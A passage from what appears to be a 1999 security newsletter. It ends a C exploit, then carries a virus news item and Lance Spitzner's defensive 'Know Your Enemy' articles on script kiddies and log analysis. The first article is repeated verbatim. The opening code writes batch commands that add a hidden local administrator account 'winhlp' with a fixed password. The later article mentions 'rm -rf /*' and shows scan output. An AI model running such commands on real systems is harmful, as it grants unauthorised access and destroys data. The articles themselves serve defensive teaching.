printf("with a password of \"winhlp!!\" and add it to the Local Administrators group.\n"); printf("Once this is done it will reset the files and delete itself.\n"); fprintf(fd,"net user winhlp winhlp!! /add\n"); fprintf(fd,"net localgroup administrators winhlp /add\n"); fprintf(fd,"del wordpad.cnt\ncopy wordpad.sav wordpad.cnt\n"); fprintf(fd,"del wordpad.sav\n"); fprintf(fd,"del add.bat\n"); fclose(fd); printf("\nBatch file created."); printf("\n\nCreated. Now open up Wordpad and click on Help\n"); return 0; } @HWA 09.0 NAI ON GALADRIEL VIRUS ~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Saturday 22nd May 1999 on 12.18 pm CET Couple of days ago we wrote about Galadriel virus. This virus infects files with the CSC extension when an infected script is run from under CorelDraw and Corel Photo Paint 7, 8 and 9. A user is likely to notice the presence of the virus because many scripts stop executing properly when infected and a CorelDraw error message will occur. The CSC/CSV.A virus does not work under the WordPerfect suite as this suite uses a different language than the Corel script. NAI categorized this virus as Low risk, and you could update your VirusScan with these patches: VirusScan 3 & VirusScan 4.0 @HWA 10.0 Know your enemy parts 1,2 and 3 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Part 1 The Attack of the Script Kiddie Know Your Enemy Lance Spitzner Last Modified: May 23, 1999 My commander used to tell me that to secure yourself against the enemy, you have to first know who your enemy is. This military doctrine readily applies to the world of network security. Just like the military, you have resources that you are trying to protect. To help protect these resources, you need to know who your threat is and how they are going to attack. This article does just that, it discusses the methodology and tools used by one of the most common and universal threats, the Script Kiddie. Who is the Script Kiddie The script kiddie is someone looking for the easy kill. They are not out for specific information or targeting a specific company. Their goal is to gain root the easiest way possible. They do this by focusing on a small number of exploits, and then searching the entire Internet for that exploit. Sooner or later they find someone vulnerable. Some of them are advance users who develop their own tools and leave behind sophisticated backdoors. Others have no idea what they are doing and only know how to type "go" at the command prompt. Regardless of the their skill level, they all share a common strategy, randomly search for a specific weakness, then exploit that weakness. The Threat It is this random selection of targets that make the script kiddie such a dangerous threat. Sooner or later your systems and networks will be probed, you cannot hide from them. I know of admins who were amazed to have their systems scanned when they had been up for only two days, and no one knew about them. There is nothing amazing here. Most likely, their systems were scanned by a script kiddie who happened to be sweeping that network block. If this was limited to several individual scans, statistics would be in your favor. With millions of systems on the Internet, odds are that no one would find you. However, this is not the case. Most of these tools are easy to use and widely distributed, anyone can use them. A rapidly growing number of people are obtaining these tools at an alarming rate. As the Internet knows no geographic bounds, this threat has quickly spread throughout the world. Suddenly, the law of numbers is turning against us. With so many users on the Internet using these tools, it is no longer a question of if, but when you will be probed. This is an excellent example of why security through obscurity can fail you. You may believe that if no one knows about your systems, you are secure. Others believe that their systems are of no value, so why would anyone probe them? It is these very systems that the script kiddies are searching for, the unprotected system that is easy to exploit, the easy kill. The Methodology The script kiddie methodology is a simple one. Scan the Internet for a specific weakness, when you find it, exploit it. Most of the tools they use are automated, requiring little interaction. You launch the tool, then come back several days later to get your results. No two tools are alike, just as no two exploits are alike. However, most of the tools use the same strategy. First, develop a database of IPs that can be scanned. Then, scan those IPs for a specific vulnerability. For example, lets say a user had a tool that could exploit imap on Linux systems, such as imapd_exploit.c. First, they would develop a database of IP addresses that they could scan (i.e., systems that are up and reachable). Once this database of IP addresses is built, the user would want to determine which systems were running Linux. Many scanners today can easily determine this by sending bad packets to a system and seeing how they respond, such as Fyodor's nmap. Then, tools would be used to determine what Linux systems were running imap. All that is left now is to exploit those vulnerable systems. You would think that all this scanning would be extremely noisy, attracting a great deal of attention. However, many people are not monitoring there systems, and do not realize they are being scanned. Also, many script kiddies quietly look for a single system they can exploit. Once they have exploited a system, they now use this systems as a launching pad. They can boldly scan the entire Internet without fear of retribution. If their scans are detected, the system admin and not the blackhat will be held liable. Also, these scan results are often archived or shared among other users, then used at a later date. For example, a user develops a database of what ports are open on reachable Linux systems. The user built this database to exploit the current imap vulnerability. However, lets say that a month from now a new Linux exploit is identified on a different port. Instead of having to build a new database (which is the most time consuming part), the user can quickly review his archived database and compromise the vulnerable systems. As an alternative, script kiddies share or even buy databases of vulnerable systems from each other. The script kiddie can then exploit your system without even scanning it. Just because your systems have not been scanned recently does not mean you are secure. The more sophisticated blackhats implement trojans and backdoors once they compromise a system. Backdoors allow easy and unnoticed access to the system whenever the user wants. The trojans make the intruder undetectable. He would not show up in any of the logs, systems processes, or file structure. He builds a comfortable and safe home where he can blatantly scan the Internet. For more information on this, check out Know Your Enemy: III. These attacks are not limited to a certain time of the day. Many admins search their log entries for probes that happen late at night, believing this is when blackhats attack. Script kiddies attack at any time. As they are scanning 24hrs a day, you have no idea when the probe will happen. Also, these attacks are launched throughout the world. Just as the Internet knows no geographical bounds, it knows no time zones. It may be midnight where the blackhat is, but it is 1pm for you. The Tools The tools used are extremely simple in use. Most are limited to a single purpose with few options. First come the tools used to build an IP database. These tools are truly random, as they indiscriminently scan the Internet. For example, one tool has a single option, A, B, or C. The letter you select determines the size of the network to be scanned. The tool then randomly selects which IP network to scan. Another tool uses a domain name (z0ne is an excellent example of this). The tools builds an IP database by conducting zone transfers of the domain name and all sub-domains. User's have built databases with over 2 million IPs by scanning the entire .com or .edu domain. Once discovered, the IPs are then scanned by tools to determine vulnerabilities, such as the version of named, operating system, or services running on the system Once the vulnerable systems have been identified, the blackhat strikes. Several tools exist that combine all these features together, simplifying the process even greater, such as sscan by jsbach. For a better understanding of how these tools are used, check out Know Your Enemy: II. How to Protect Against This Threat There are steps you can take to protect yourself against this threat. First, the script kiddie is going for the easy kill, they are looking for common exploits. Make sure your systems and networks are not vulnerable to these exploits. Both http://www.cert.org and http://www.ciac.org are excellent sources on what a common exploit is. Also, the listserv bugtraq is one of the best sources of information. Another way to protect yourself is run only the services you need. If you do not need a service, turn it off. If you do need a service, make sure it is the latest version. For examples on how to do this, check out Armoring Solaris , Armoring Linux or Armoring NT. As you learned from the tools section, DNS servers are often used to develop a database of systems that can be probed. Limit the systems that can conduct zone transfers from your Name Servers. Log any unauthorized zone transfers and follow up on them. I highly recommend upgrading to the latest version of BIND (software used for Domain Name Service), which you can find at http://www.isc.org/bind.html. Last, watch for your systems being probed. Once identified, you can track these probes and gain a better understanding of the threats to your network and react to these threats. Conclusion The script kiddie poses a threat to all systems. They show no bias and scan all systems, regardless of location and value. Sooner or later, your system will be probed. By understanding their motives and methods, you can better protect your systems against this threat. NOTE: Thanks to Brad Powell at Sun's Security Team for his help on this article Author's bio Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net . Whitepapers / Publications The Attack of the Script Kiddie Know Your Enemy Lance Spitzner Last Modified: May 23, 1999 My commander used to tell me that to secure yourself against the enemy, you have to first know who your enemy is. This military doctrine readily applies to the world of network security. Just like the military, you have resources that you are trying to protect. To help protect these resources, you need to know who your threat is and how they are going to attack. This article does just that, it discusses the methodology and tools used by one of the most common and universal threats, the Script Kiddie. Who is the Script Kiddie The script kiddie is someone looking for the easy kill. They are not out for specific information or targeting a specific company. Their goal is to gain root the easiest way possible. They do this by focusing on a small number of exploits, and then searching the entire Internet for that exploit. Sooner or later they find someone vulnerable. Some of them are advance users who develop their own tools and leave behind sophisticated backdoors. Others have no idea what they are doing and only know how to type "go" at the command prompt. Regardless of the their skill level, they all share a common strategy, randomly search for a specific weakness, then exploit that weakness. The Threat It is this random selection of targets that make the script kiddie such a dangerous threat. Sooner or later your systems and networks will be probed, you cannot hide from them. I know of admins who were amazed to have their systems scanned when they had been up for only two days, and no one knew about them. There is nothing amazing here. Most likely, their systems were scanned by a script kiddie who happened to be sweeping that network block. If this was limited to several individual scans, statistics would be in your favor. With millions of systems on the Internet, odds are that no one would find you. However, this is not the case. Most of these tools are easy to use and widely distributed, anyone can use them. A rapidly growing number of people are obtaining these tools at an alarming rate. As the Internet knows no geographic bounds, this threat has quickly spread throughout the world. Suddenly, the law of numbers is turning against us. With so many users on the Internet using these tools, it is no longer a question of if, but when you will be probed. This is an excellent example of why security through obscurity can fail you. You may believe that if no one knows about your systems, you are secure. Others believe that their systems are of no value, so why would anyone probe them? It is these very systems that the script kiddies are searching for, the unprotected system that is easy to exploit, the easy kill. The Methodology The script kiddie methodology is a simple one. Scan the Internet for a specific weakness, when you find it, exploit it. Most of the tools they use are automated, requiring little interaction. You launch the tool, then come back several days later to get your results. No two tools are alike, just as no two exploits are alike. However, most of the tools use the same strategy. First, develop a database of IPs that can be scanned. Then, scan those IPs for a specific vulnerability. For example, lets say a user had a tool that could exploit imap on Linux systems, such as imapd_exploit.c. First, they would develop a database of IP addresses that they could scan (i.e., systems that are up and reachable). Once this database of IP addresses is built, the user would want to determine which systems were running Linux. Many scanners today can easily determine this by sending bad packets to a system and seeing how they respond, such as Fyodor's nmap. Then, tools would be used to determine what Linux systems were running imap. All that is left now is to exploit those vulnerable systems. You would think that all this scanning would be extremely noisy, attracting a great deal of attention. However, many people are not monitoring there systems, and do not realize they are being scanned. Also, many script kiddies quietly look for a single system they can exploit. Once they have exploited a system, they now use this systems as a launching pad. They can boldly scan the entire Internet without fear of retribution. If their scans are detected, the system admin and not the blackhat will be held liable. Also, these scan results are often archived or shared among other users, then used at a later date. For example, a user develops a database of what ports are open on reachable Linux systems. The user built this database to exploit the current imap vulnerability. However, lets say that a month from now a new Linux exploit is identified on a different port. Instead of having to build a new database (which is the most time consuming part), the user can quickly review his archived database and compromise the vulnerable systems. As an alternative, script kiddies share or even buy databases of vulnerable systems from each other. The script kiddie can then exploit your system without even scanning it. Just because your systems have not been scanned recently does not mean you are secure. The more sophisticated blackhats implement trojans and backdoors once they compromise a system. Backdoors allow easy and unnoticed access to the system whenever the user wants. The trojans make the intruder undetectable. He would not show up in any of the logs, systems processes, or file structure. He builds a comfortable and safe home where he can blatantly scan the Internet. For more information on this, check out Know Your Enemy: III. These attacks are not limited to a certain time of the day. Many admins search their log entries for probes that happen late at night, believing this is when blackhats attack. Script kiddies attack at any time. As they are scanning 24hrs a day, you have no idea when the probe will happen. Also, these attacks are launched throughout the world. Just as the Internet knows no geographical bounds, it knows no time zones. It may be midnight where the blackhat is, but it is 1pm for you. The Tools The tools used are extremely simple in use. Most are limited to a single purpose with few options. First come the tools used to build an IP database. These tools are truly random, as they indiscriminently scan the Internet. For example, one tool has a single option, A, B, or C. The letter you select determines the size of the network to be scanned. The tool then randomly selects which IP network to scan. Another tool uses a domain name (z0ne is an excellent example of this). The tools builds an IP database by conducting zone transfers of the domain name and all sub-domains. User's have built databases with over 2 million IPs by scanning the entire .com or .edu domain. Once discovered, the IPs are then scanned by tools to determine vulnerabilities, such as the version of named, operating system, or services running on the system Once the vulnerable systems have been identified, the blackhat strikes. Several tools exist that combine all these features together, simplifying the process even greater, such as sscan by jsbach. For a better understanding of how these tools are used, check out Know Your Enemy: II. How to Protect Against This Threat There are steps you can take to protect yourself against this threat. First, the script kiddie is going for the easy kill, they are looking for common exploits. Make sure your systems and networks are not vulnerable to these exploits. Both http://www.cert.org and http://www.ciac.org are excellent sources on what a common exploit is. Also, the listserv bugtraq is one of the best sources of information. Another way to protect yourself is run only the services you need. If you do not need a service, turn it off. If you do need a service, make sure it is the latest version. For examples on how to do this, check out Armoring Solaris , Armoring Linux or Armoring NT. As you learned from the tools section, DNS servers are often used to develop a database of systems that can be probed. Limit the systems that can conduct zone transfers from your Name Servers. Log any unauthorized zone transfers and follow up on them. I highly recommend upgrading to the latest version of BIND (software used for Domain Name Service), which you can find at http://www.isc.org/bind.html. Last, watch for your systems being probed. Once identified, you can track these probes and gain a better understanding of the threats to your network and react to these threats. Conclusion The script kiddie poses a threat to all systems. They show no bias and scan all systems, regardless of location and value. Sooner or later, your system will be probed. By understanding their motives and methods, you can better protect your systems against this threat. NOTE: Thanks to Brad Powell at Sun's Security Team for his help on this article Author's bio Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net . Part 2 Tracking their moves Know Your Enemy: II Lance Spitzner Last Modified: May 23, 1999 In the first article, Know Your Enemy, we covered the tools and methodologies of the Script Kiddie. Specifically, how they probe for vulnerabilities and then attack. Now we will cover how to track their movements. Just as in the military, you want to track the bad guys and know what they are doing. We will cover what you can, and cannot determine, with your system logs. You may be able to determine if you are being probed, what you were being probed for, what tools were used, and if they successful. The examples provided here focus on Linux, but can apply to almost any flavor of Unix. Keep in mind, there is no guaranteed way to track the enemy's every step. However, this article is a good place to start. Securing Your Logs This article is not on Intrusion Detection, there are a variety of excellent sources that cover IDS. If you are interested in intrusion detection, I recommend checking out applicatons such as Network Flight Recorder or swatch. This article focuses on intelligence gathering. Specifically, how to figure out what the enemy is doing by reviewing your system logs. You will be surprised how much information you will find in your own log files. However, before we can talk about reviewing your logs, we first have to discuss securing your system logs. Your log files are worthless if you cannot trust the integrity of them. The first thing most blackhats do is alter log files on a compromised system. There are a variety of rootkits that will wipe out their presence from log files (such as cloak), or alter logging all together (such as trojaned syslogd binaries). So, the first step to reviewing your logs is securing your logs. This means you will need to use a remote log server. Regardless of how secure your system is, you cannot trust your logs on a compromised system. If nothing else, the blackhat can simply do a rm -rf /* on your system, wiping you hard drive clean. This makes recovering your logs somewhat difficult. To protect against this, you will want all your systems to log traffic both locally and to a remote log server. I recommend making your log server a dedicated system, ie. the only thing it should be doing is collecting logs from other systems.. If money is an issue, you can easily build a linux box to act as your log server. This server should be highly secured, with all services shut off, allowing only console access (see Armoring Linux for an example). Also, ensure that port 514 UDP is blocked or firewalled at your Internet connection. This protects your log server from receiving bad or un-authorized logging information from the Internet. For those of you who like to get sneaky, something I like to do is recompile syslogd to read a different configuration file, such as /var/tmp/.conf. This way the blackhat does not realize where the real configuration file is. This is simply done by changing the entry "/etc/syslog.conf" in the source code to whatever file you want. We then setup our new configuration file to log both locally and to the remote log server (see example). Make sure you maintain a standard copy of the configuration file, /etc/syslog.conf, which points to all local logging. Even though this configuration file is now useless, this will throw off the blackhat from realizing the true destination of our remote logging. Another option for your systems is to use a secure method of logging. One option is to replace your syslogd binary with something that has integrity checking and a greater breadth of options. One option is syslog-ng, which you can find at http://www.balabit.hu/products/syslog-ng.html Most of the logs we will use are the ones stored on the remote log server. As mentioned earlier, we can be fairly confident of the integrity of these logs since they are on a remote and secured system. Also, since all systems are logging to a single source, it is much easier to identify patterns in these logs. We can quickly review what's happening to all the systems in one source. The only time you would want to review logs stored locally on a system is to compare them to what the log server has. You can determine if the local logs have been altered by comparing them to the remote logs. Pattern Matching By looking at your log entries, you can usually determine if you are being port scanned. Most Script Kiddies scan a network for a single vulnerability. If your logs show most of your systems being connected from the same remote system, on the same port, this is most likely an exploit scan. Basically, the enemy has an exploit for a single vulnerability, and they are scanning your network for it. When they find it, they exploit it. For most Linux systems, TCP Wrappers is installed be default. So, we would find most of these connections in /var/log/secure. For other flavors of Unix, we can log all inetd connections by launching inetd with the "-t" flag., facility daemon. A typical exploit scan would look like something below. Here we have a source scanning for the wu-ftpd vulnerability. /var/log/secure Apr 10 13:43:48 mozart in.ftpd[6613]: connect from 192.168.11.200 Apr 10 13:43:51 bach in.ftpd[6613]: connect from 192.168.11.200 Apr 10 13:43:54 hadyen in.ftpd[6613]: connect from 192.168.11.200 Apr 10 13:43:57 vivaldi in.ftpd[6613]: connect from 192.168.11.200 Apr 10 13:43:58 brahms in.ftpd[6613]: connect from 192.168.11.200 Here we see the source 192.168.11.200 scanning our network. Notice how the source sequentially scans each IP (this is not always the case). This is the advantage of having a log server, you can more easily identify patterns in your network since all the logs are combined. The repeated connections to port 21, ftp, indicated they were most likely looking for the wu-ftpd exploit. We have just determined what the blackhat is looking for. Often, scans tend to come in phases. Someone will release code for an imap exploit, you will suddenly see a rush of imaps scans in your logs. The next month you will be hit by ftp. An excellent source for current exploits is http://www.cert.org/advisories/ Sometimes, tools will scan for a variety of exploits at the same time, so you may see a single source connecting to several ports. Keep in mind, if you are not logging the service, you will not know if you are scanned for it. For example, most rpc connections are not logged. However, many services can simply be added to /etc/inetd.conf for logging with TCP Wrappers. For example, you can add an entry in /etc/inetd.conf for NetBus. You can define TCP Wrappers to safely deny and log the connections (see Intrusion Detection for more info on this). What's the Tool? Sometimes you can actually determine the tools being used to scan your network. Some of the more basic tools scan for a specific exploit, such as ftp-scan.c. If only a single port or vulnerability is being probed on your network, they are most likely using one of these "single mission" tools. However, there exist tools that probe for a variety of vulnerabilities or weaknesses, the two most popular are sscan by jsbach and nmap by Fyodor. I've selected these two tools because they represent the two "categories" of scanning tools. I highly recommend you run these tools against your own network, you may be surprised by the results :) sscan represents the "all purpose" Script Kiddie scanning tool, and its probably one of the best ones out there. It quickly probes a network for a variety of vulnerabilities (including cgi-bin). It is easily customizable, allowing you to add probes for new exploits. You just give the tool a network and network mask, and it does the rest for you. However, the user must be root to use it. The output is extremely easy to interpret (hence making it so popular): It gives a concise summary of many vulnerable services. All you have to do is run sscan against a network, grep for the word "VULN" in the output, and then run the "exploit du jour". Below is an example of sscan ran against the system mozart (172.17.6.30). otto #./sscan -o 172.17.6.30 --------------------------<[ * report for host mozart * <[ tcp port: 80 (http) ]> <[ tcp port: 23 (telnet) ]> <[ tcp port: 143 (imap) ]> <[ tcp port: 110 (pop-3) ]> <[ tcp port: 111 (sunrpc) ]> <[ tcp port: 79 (finger) ]> <[ tcp port: 53 (domain) ]> <[ tcp port: 25 (smtp) ]> <[ tcp port: 21 (ftp) ]> --<[ *OS*: mozart: os detected: redhat linux 5.1 mozart: VULN: linux box vulnerable to named overflow. -<[ *CGI*: 172.17.6.30: tried to redirect a /cgi-bin/phf request. -<[ *FINGER*: mozart: root: account exists. --<[ *VULN*: mozart: sendmail will 'expn' accounts for us --<[ *VULN*: mozart: linux bind/iquery remote buffer overflow --<[ *VULN*: mozart: linux mountd remote buffer overflow ---------------------------<[ * scan of mozart completed * Nmap represents the "raw data" tool set. It doesn't tell you what vulnerabilities exist, rather, it tells you what ports are open, you determine the security impact. Nmap has quickly become the port scanner of choice, and with good reason. It takes the best of a variety of port scanners and puts all their functionality into a single tool, including OS detection, various packet assembly options, both UDP and TCP scanning, randomization, etc. However, you need networking skills to use the tool and interpret the data. Below is an example of nmap ran against the same system. otto #nmap -sS -O 172.17.6.30 Starting nmap V. 2.08 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) Interesting ports on mozart (172.17.6.30): Port State Protocol Service 21 open tcp ftp 23 open tcp telnet 25 open tcp smtp 37 open tcp time 53 open tcp domain 70 open tcp gopher 79 open tcp finger 80 open tcp http 109 open tcp pop-2 110 open tcp pop-3 111 open tcp sunrpc 143 open tcp imap2 513 open tcp login 514 open tcp shell 635 open tcp unknown 2049 open tcp nfs TCP Sequence Prediction: Class=truly random Difficulty=9999999 (Good luck!) Remote operating system guess: Linux 2.0.35-36 Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds By reviewing your logs, you can determine which of these tools were used against you. To do this, you have to understand how the tools work. First, an sscan will log in as follows (this is a default scan with no modifications to any config files): /var/log/secure Apr 14 19:18:56 mozart in.telnetd[11634]: connect from 192.168.11.200 Apr 14 19:18:56 mozart imapd[11635]: connect from 192.168.11.200 Apr 14 19:18:56 mozart in.fingerd[11637]: connect from 192.168.11.200 Apr 14 19:18:56 mozart ipop3d[11638]: connect from 192.168.11.200 Apr 14 19:18:56 mozart in.telnetd[11639]: connect from 192.168.11.200 Apr 14 19:18:56 mozart in.ftpd[11640]: connect from 192.168.11.200 Apr 14 19:19:03 mozart ipop3d[11642]: connect from 192.168.11.200 Apr 14 19:19:03 mozart imapd[11643]: connect from 192.168.11.200 Apr 14 19:19:04 mozart in.fingerd[11646]: connect from 192.168.11.200 Apr 14 19:19:05 mozart in.fingerd[11648]: connect from 192.168.11.200 /var/log/maillog Apr 14 21:01:58 mozart imapd[11667]: command stream end of file, while reading line user=??? host=[192.168.11.200] Apr 14 21:01:58 mozart ipop3d[11668]: No such file or directory while reading line user=??? host=[192.168.11.200] Apr 14 21:02:05 mozart sendmail[11675]: NOQUEUE: [192.168.11.200]: expn root /var/log/messages Apr 14 21:03:09 mozart telnetd[11682]: ttloop: peer died: Invalid or incomplete multibyte or wide character Apr 14 21:03:12 mozart ftpd[11688]: FTP session closed sscan also scans for cgi-bin vulnerabilities. These probes will not be logged by syslogd, you will find them in access_log. I decided to included them anyway for your edification :) /var/log/httpd/access_log 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/phf HTTP/1.0" 302 192 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/Count.cgi HTTP/1.0" 404 170 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/test-cgi HTTP/1.0" 404 169